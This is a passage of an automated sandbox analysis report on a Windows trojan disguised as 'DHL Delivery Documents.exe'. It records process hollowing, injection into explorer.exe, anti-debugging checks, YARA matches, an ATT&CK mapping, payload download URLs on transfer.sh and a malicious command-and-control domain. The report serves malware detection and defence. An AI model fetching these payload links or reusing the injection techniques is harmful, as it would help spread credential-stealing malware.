          Source: C:\Windows\SysWOW64\msdt.exeCode function: 12_2_054A2581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 12_2_054A2581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 12_2_054A2581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 12_2_05472D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 12_2_05472D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 12_2_05472D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 12_2_05472D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 12_2_05472D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 12_2_054AFD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 12_2_054AFD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 12_2_05532D82 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 12_2_05532D82 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 12_2_05532D82 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 12_2_05532D82 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 12_2_05532D82 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 12_2_05532D82 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 12_2_05532D82 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 12_2_054A35A1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 12_2_055405AC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 12_2_055405AC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 12_2_054A1DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 12_2_054A1DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 12_2_054A1DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 12_2_0550C450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 12_2_0550C450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 12_2_054AA44B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 12_2_0549746D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 12_2_054AAC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 12_2_054AAC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 12_2_054AAC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 12_2_054AAC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 12_2_054AAC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 12_2_054AAC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 12_2_054AAC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 12_2_054AAC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 12_2_054AAC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 12_2_054AAC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 12_2_054AAC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 12_2_0549B477 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 12_2_0549B477 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 12_2_0549B477 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 12_2_0549B477 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 12_2_0549B477 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 12_2_0549B477 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 12_2_0549B477 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 12_2_0549B477 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 12_2_0549B477 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 12_2_0549B477 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 12_2_0549B477 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 12_2_0549B477 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 12_2_054F6C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 12_2_054F6C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 12_2_054F6C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 12_2_054F6C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 12_2_05531C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 12_2_05531C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 12_2_05531C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 12_2_05531C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 12_2_05531C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 12_2_05531C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 12_2_05531C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 12_2_05531C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 12_2_05531C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 12_2_05531C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 12_2_05531C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 12_2_05531C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 12_2_05531C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess queried: DebugPort
          Source: C:\Windows\SysWOW64\msdt.exeProcess queried: DebugPort
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_00409B50 LdrLoadDll,
          Source: C:\Users\user\Desktop\DHL Delivery Documents.exeMemory allocated: page read and write | page guard

          HIPS / PFW / Operating System Protection Evasion

          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe | Section unmapped: C:\Windows\SysWOW64\msdt.exe base address: EB0000
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe | Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe | Section loaded: unknown target: C:\Windows\SysWOW64\msdt.exe protection: execute and read and write
          Source: C:\Windows\SysWOW64\msdt.exe | Section loaded: unknown target: C:\Windows\explorer.exe protection: read write
          Source: C:\Windows\SysWOW64\msdt.exe | Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Source: C:\Users\user\Desktop\DHL Delivery Documents.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: 400000
          Source: C:\Users\user\Desktop\DHL Delivery Documents.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: 401000
          Source: C:\Users\user\Desktop\DHL Delivery Documents.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: BFF008
          Source: C:\Users\user\Desktop\DHL Delivery Documents.exe | Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: 400000 protect: page execute and read and write
          Source: C:\Users\user\Desktop\DHL Delivery Documents.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: 400000 value starts with: 4D5A
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe | Thread APC queued: target process: C:\Windows\explorer.exe
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe | Thread register set: target process: 3352
          Source: C:\Windows\SysWOW64\msdt.exe | Thread register set: target process: 3352
          Source: C:\Users\user\Desktop\DHL Delivery Documents.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
          Source: C:\Windows\SysWOW64\msdt.exe | Process created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
          Source: explorer.exe, 00000008.00000000.335316675.00000000011E0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000008.00000000.301532126.00000000011E0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000008.00000000.317758768.00000000011E0000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Program Manager
          Source: explorer.exe, 00000008.00000000.301326680.0000000000B68000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000008.00000000.334866837.0000000000B68000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000008.00000000.316167591.0000000000B68000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Progman\Pr
          Source: explorer.exe, 00000008.00000000.335316675.00000000011E0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000008.00000000.301532126.00000000011E0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000008.00000000.317758768.00000000011E0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000008.00000000.339922682.0000000005E10000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: Shell_TrayWnd
          Source: explorer.exe, 00000008.00000000.335316675.00000000011E0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000008.00000000.301532126.00000000011E0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000008.00000000.317758768.00000000011E0000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Progman
          Source: explorer.exe, 00000008.00000000.335316675.00000000011E0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000008.00000000.301532126.00000000011E0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000008.00000000.317758768.00000000011E0000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Progmanlock
          Source: explorer.exe, 00000008.00000000.344779338.0000000008778000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000000.309195507.0000000008778000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: Shell_TrayWndh
          Source: C:\Users\user\Desktop\DHL Delivery Documents.exe | Queries volume information: C:\Users\user\Desktop\DHL Delivery Documents.exe VolumeInformation
          Source: C:\Users\user\Desktop\DHL Delivery Documents.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

          Stealing of Sensitive Information

          Source: Yara match | File source: 7.0.aspnet_compiler.exe.400000.1.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 7.2.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 7.0.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 7.0.aspnet_compiler.exe.400000.2.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 7.0.aspnet_compiler.exe.400000.2.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 7.0.aspnet_compiler.exe.400000.1.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 7.2.aspnet_compiler.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 00000007.00000000.296093050.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000008.00000000.331650604.000000001025A000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 0000000C.00000002.592017625.00000000035D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000007.00000000.296408181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000002.00000002.299090873.0000000013AD4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000007.00000002.356715878.00000000012E0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000007.00000002.356781952.0000000001320000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 0000000C.00000002.596403511.0000000004FF0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000007.00000002.356484497.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 0000000C.00000002.586492056.0000000003130000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY

          Remote Access Functionality

          Source: Yara match | File source: 7.0.aspnet_compiler.exe.400000.1.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 7.2.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 7.0.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 7.0.aspnet_compiler.exe.400000.2.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 7.0.aspnet_compiler.exe.400000.2.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 7.0.aspnet_compiler.exe.400000.1.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 7.2.aspnet_compiler.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 00000007.00000000.296093050.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000008.00000000.331650604.000000001025A000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 0000000C.00000002.592017625.00000000035D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000007.00000000.296408181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000002.00000002.299090873.0000000013AD4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000007.00000002.356715878.00000000012E0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000007.00000002.356781952.0000000001320000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 0000000C.00000002.596403511.0000000004FF0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000007.00000002.356484497.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 0000000C.00000002.586492056.0000000003130000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
ATT&CK Matrix, listed per tactic (a bracketed figure is the match count displayed next to that technique in the original matrix):

• Initial Access: Valid Accounts, Default Accounts, Domain Accounts, Local Accounts, Cloud Accounts, Replication Through Removable Media, External Remote Services
• Execution: Shared Modules [1], Scheduled Task/Job, At (Linux), At (Windows), Cron, Launchd, Scheduled Task
• Persistence: Path Interception, Boot or Logon Initialization Scripts, Logon Script (Windows), Logon Script (Mac), Network Logon Script, Rc.common, Startup Items
• Privilege Escalation: Process Injection [712], Boot or Logon Initialization Scripts, Logon Script (Windows), Logon Script (Mac), Network Logon Script, Rc.common, Startup Items
• Defense Evasion: Masquerading [1], Disable or Modify Tools [1], Virtualization/Sandbox Evasion [31], Process Injection [712], Deobfuscate/Decode Files or Information [1], Obfuscated Files or Information [3], Software Packing [11]
• Credential Access: OS Credential Dumping, LSASS Memory, Security Account Manager, NTDS, LSA Secrets, Cached Domain Credentials, DCSync
• Discovery: Security Software Discovery [121], Process Discovery [2], Virtualization/Sandbox Evasion [31], Remote System Discovery [1], System Information Discovery [112], System Owner/User Discovery, Network Sniffing
• Lateral Movement: Remote Services, Remote Desktop Protocol, SMB/Windows Admin Shares, Distributed Component Object Model, SSH, VNC, Windows Remote Management
• Collection: Archive Collected Data [1], Data from Removable Media, Data from Network Shared Drive, Input Capture, Keylogging, GUI Input Capture, Web Portal Capture
• Exfiltration: Exfiltration Over Other Network Medium, Exfiltration Over Bluetooth, Automated Exfiltration, Scheduled Transfer, Data Transfer Size Limits, Exfiltration Over C2 Channel, Exfiltration Over Alternative Protocol
• Command and Control: Encrypted Channel [11], Ingress Tool Transfer [1], Non-Application Layer Protocol [2], Application Layer Protocol [13], Fallback Channels, Multiband Communication, Commonly Used Port
• Network Effects: Eavesdrop on Insecure Network Communication, Exploit SS7 to Redirect Phone Calls/SMS, Exploit SS7 to Track Device Location, SIM Card Swap, Manipulate Device Communication, Jamming or Denial of Service, Rogue Wi-Fi Access Points
• Remote Service Effects: Remotely Track Device Without Authorization, Remotely Wipe Data Without Authorization, Obtain Device Cloud Backups
• Impact: Modify System Partition, Device Lockout, Delete Device Data, Carrier Billing Fraud, Manipulate App Store Rankings or Ratings, Abuse Accessibility Features, Data Encrypted for Impact
Behavior Graph (ID: 562120; Sample: DHL Delivery Documents.exe; Startdate: 28/01/2022; Architecture: WINDOWS; Score: 100)

Top-level signatures:
• Found malware configuration
• Malicious sample detected (through community Yara rule)
• Antivirus detection for URL or domain
• 7 other signatures

Process tree:
• DHL Delivery Documents.exe (started)
  • Network: transfer.sh, 144.76.136.153, port 443 (local ports 49751, 49752), HETZNER-ASDE, Germany
  • Dropped file: C:\Users\...\DHL Delivery Documents.exe.log (ASCII)
  • Signatures: Writes to foreign memory regions; Allocates memory in foreign processes; Injects a PE file into a foreign processes
  • aspnet_compiler.exe (started)
    • Signatures: Modifies the context of a thread in another process (thread injection); Maps a DLL or memory area into another process; Sample uses process hollowing technique; 2 other signatures
    • explorer.exe (injected)
      • msdt.exe (started)
        • Signatures: Modifies the context of a thread in another process (thread injection); Maps a DLL or memory area into another process; Tries to detect virtualization through RDTSC time measurements
        • cmd.exe (started)
          • conhost.exe (started)

Source | Detection | Scanner | Label
DHL Delivery Documents.exe | 31% | Virustotal |
DHL Delivery Documents.exe | 100% | Joe Sandbox ML |
No Antivirus matches
Source | Detection | Scanner | Label
7.0.aspnet_compiler.exe.400000.1.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen
7.2.aspnet_compiler.exe.400000.0.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen
7.0.aspnet_compiler.exe.400000.2.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen
7.0.aspnet_compiler.exe.400000.0.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen
No Antivirus matches
Source | Detection | Scanner | Label
http://www.microsoft.c | 0% | URL Reputation | safe
http://crl.microf | 0% | Avira URL Cloud | safe
http://crl.micros. | 0% | Avira URL Cloud | safe
www.trabaho-academy.net/zqzw/ | 1% | Virustotal |
www.trabaho-academy.net/zqzw/ | 100% | Avira URL Cloud | malware
Name | IP | Active | Malicious | Antivirus Detection | Reputation
transfer.sh | 144.76.136.153 | true | false | | high
Name | Malicious | Antivirus Detection | Reputation
https://transfer.sh/get/mVKia7/BINCC.txt | false | | high
www.trabaho-academy.net/zqzw/ | true | 1% Virustotal; Avira URL Cloud: malware | low
https://transfer.sh/get/KkxDr1/bbbbbbbbbbb.txt | false | | high
Name | Source | Malicious | Antivirus Detection | Reputation
https://transfer.sh | DHL Delivery Documents.exe, 00000002.00000002.297376238.0000000003AC1000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://www.microsoft.c | DHL Delivery Documents.exe, 00000002.00000002.300447432.000000001E2C4000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://transfer.sh/get/KkxDr1/bbbbbbbbbbb.txt9BNCXGAS.Properties.ResourcesL | DHL Delivery Documents.exe | false | | high
http://crl.microf | DHL Delivery Documents.exe, 00000002.00000002.300447432.000000001E2C4000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://crl.micros. | DHL Delivery Documents.exe, 00000002.00000002.300447432.000000001E2C4000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | DHL Delivery Documents.exe, 00000002.00000002.297376238.0000000003AC1000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://transfer.sh/get/KkxDr1/bbbbbbbbbbb.txtx | DHL Delivery Documents.exe, 00000002.00000002.297598334.0000000003B1B000.00000004.00000800.00020000.00000000.sdmp | false | | high
IP | Domain | Country | ASN | ASN Name | Malicious
144.76.136.153 | transfer.sh | Germany | 24940 | HETZNER-ASDE | false
                        Joe Sandbox Version:34.0.0 Boulder Opal
                        Analysis ID:562120
                        Start date:28.01.2022
                        Start time:14:02:32
                        Joe Sandbox Product:CloudBasic
                        Overall analysis duration:0h 9m 52s
                        Hypervisor based Inspection enabled:false
                        Report type:light
                        Sample file name:DHL Delivery Documents.exe
                        Cookbook file name:default.jbs
                        Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of new started processes analysed:18
                        Number of new started drivers analysed:0
                        Number of existing processes analysed:0
                        Number of existing drivers analysed:0
                        Number of injected processes analysed:1
                        Technologies:
                        • HCA enabled
                        • EGA enabled
                        • HDC enabled
                        • AMSI enabled
                        Analysis Mode:default
                        Analysis stop reason:Timeout
                        Detection:MAL
                        Classification:mal100.troj.evad.winEXE@7/1@1/1
                        EGA Information:
                        • Successful, ratio: 100%
                        HDC Information:
                        • Successful, ratio: 64% (good quality ratio 58.7%)
                        • Quality average: 71.6%
                        • Quality standard deviation: 31.2%
                        HCA Information:
                        • Successful, ratio: 100%
                        • Number of executed functions: 0
                        • Number of non-executed functions: 0
                        Cookbook Comments:
                        • Adjust boot time
                        • Enable AMSI
                        • Found application associated with file extension: .exe
                        • Exclude process from analysis (whitelisted): MpCmdRun.exe, BackgroundTransferHost.exe, WMIADAP.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, svchost.exe
                        • TCP Packets have been reduced to 100
                        • Excluded IPs from analysis (whitelisted): 23.211.6.115
                        • Excluded domains from analysis (whitelisted): e12564.dspb.akamaiedge.net, client.wns.windows.com, store-images.s-microsoft.com, ctldl.windowsupdate.com, store-images.s-microsoft.com-c.edgekey.net, arc.msn.com
• Not all processes were analyzed; the report is missing behavior information
                        • Report size getting too big, too many NtOpenKeyEx calls found.
                        • Report size getting too big, too many NtQueryValueKey calls found.
Time | Type | Description
14:03:32 | API Interceptor | 1x Sleep call for process: DHL Delivery Documents.exe modified
                        Process:C:\Users\user\Desktop\DHL Delivery Documents.exe
                        File Type:ASCII text, with CRLF line terminators
                        Category:dropped
                        Size (bytes):1076
                        Entropy (8bit):5.368419236023932
                        Encrypted:false
                        SSDEEP:24:ML9E4KrgKDE4KGKN08AKhPKIE4TKD1KoZAE4KKPN+84xpNT:MxHKEYHKGD8AoPtHTG1hAHKKPN+vxpNT
                        MD5:BA59E2E532D7B32DDB5669F4DDA552B9
                        SHA1:56321A97094257CE0B8DD955B6F433D971093890
                        SHA-256:C46FC927838D524FB8361EA17F8BB19694C7175106544FE95367E5DF8BD9891B
                        SHA-512:2F1702E762B6DA239580311D0EEFF203DA8D584D6B5E0922DB730A4CE770DA46B750C380B70D3BED632DFBE28CAAB27B6067EEE57C152EE51828E03E5BA2214F
                        Malicious:true
                        Reputation:moderate, very likely benign file
                        Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\10a17139182a9efd561f01fada9688a5\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\4e05e2e48b8a6dd267a8c9e25ef129a7\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Configuration\e82398e9ff6885d617e4b97e31fb4f02\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Xml\f2e3165e3c718b7ac302fea40614c984\System.Xml.ni.dll",0..3,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.V
                        File type:PE32+ executable (GUI) x86-64 Mono/.Net assembly, for MS Windows
                        Entropy (8bit):6.616131066331666
                        TrID:
                        • Win64 Executable GUI Net Framework (217006/5) 49.88%
                        • Win64 Executable GUI (202006/5) 46.43%
                        • Win64 Executable (generic) (12005/4) 2.76%
                        • Generic Win/DOS Executable (2004/3) 0.46%
                        • DOS Executable Generic (2002/1) 0.46%
                        File name:DHL Delivery Documents.exe
                        File size:48640
                        MD5:5bc8492c9f262d1f9840635b87edf9c5
                        SHA1:da867a8b837e43c91414ff46d239ab95b799d04b
                        SHA256:7a4424af54555e5a81f6fa4e2b2c42c6d19c71bbcc261cd1be14af245c3b711c
                        SHA512:a9f75f93607443861c6b2ec9f242faacda666967cb6cbdab8cb8c8f208047a7a90448046242aead694fe391a2bbcb9f52688bdbee08bf492cb511f71748a365e
                        SSDEEP:768:24jw5Zoo7adxM2GzRpAgka/8HHUTQQQQQQQBdy3bI91GN6bcE/2ihWSCAtkrjL1X:2Awzf3Rpga/eHUTQQQQQQQBdBgN6b5/S
                        File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d....+.a.................8............... ....@...... ....................................@...@......@............... .....
                        Icon Hash:a289a9ed6da39200
                        Entrypoint:0x400000
                        Entrypoint Section:
                        Digitally signed:false
                        Imagebase:0x400000
                        Subsystem:windows gui
                        Image File Characteristics:LOCAL_SYMS_STRIPPED, EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, LINE_NUMS_STRIPPED
                        DLL Characteristics:NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                        Time Stamp:0x61F32B10 [Thu Jan 27 23:30:24 2022 UTC]
                        TLS Callbacks:
                        CLR (.Net) Version:v4.0.30319
                        OS Version Major:4
                        OS Version Minor:0
                        File Version Major:4
                        File Version Minor:0
                        Subsystem Version Major:4
                        Subsystem Version Minor:0
                        Import Hash:
                        Instruction
                        dec ebp
                        pop edx
                        nop
                        add byte ptr [ebx], al
                        add byte ptr [eax], al
                        add byte ptr [eax+eax], al
                        add byte ptr [eax], al
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x6000 | 0x8328 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x5796 | 0x1c | .text
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x0 | 0x0 |
